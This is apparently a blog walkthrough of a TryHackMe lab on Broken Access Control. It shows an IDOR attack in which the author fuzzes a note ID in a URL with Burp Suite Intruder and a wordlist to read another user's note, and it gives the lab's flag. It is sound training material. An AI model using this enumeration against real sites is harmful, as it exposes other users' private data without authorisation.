TryHackMe: OWASP Top 10 || Severity 5 || Broken Access Control

goay xuan hui
Apr 6, 2021

--

This challenge exploits Insecure Direct Object Reference (IDOR), which is an act of exploiting misconfiguration in the way user input is handled.

For example, when we go to http://10.10.147.196 and login with the username being noot and the password test123, we can see that the URL is http://10.10.147.196/note.php?note=1.

We can then try to manipulate the variable in the URL using Burp Suite to see if we could access the note page for other users:

  • Turn on your browser’s proxy and interceptor in Burp Suite → Forward the request to Intruder.
  • Load the payload from /usr/share/wordlists/SecLists/Fuzzing/alphanum-case.txt.
  • Once we start the attack, you can see that payload with variable 0 (http://10.10.147.196/note.php?note=0) is returning flag{fivefourthree}.

#1 Look at other users notes. What is the flag?

flag{fivefourthree}
Owasp Top 10
Tryhackme Walkthrough
Broken Access Control
Burp Suite Payload
Changing Url Variable

--

--

goay xuan hui

Written by goay xuan hui

43 Followers

A food lover, a cyber security enthusiast, a musician and a traveller, so you will see a mix of different contents in my blog. ☺️

More from goay xuan hui

Recommended from Medium

Lists

Staff Picks

455 stories299 saves

Stories to Help You Level-Up at Work

19 stories226 saves

Self-Improvement 101

20 stories612 saves

Productivity 101

20 stories568 saves

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech

Teams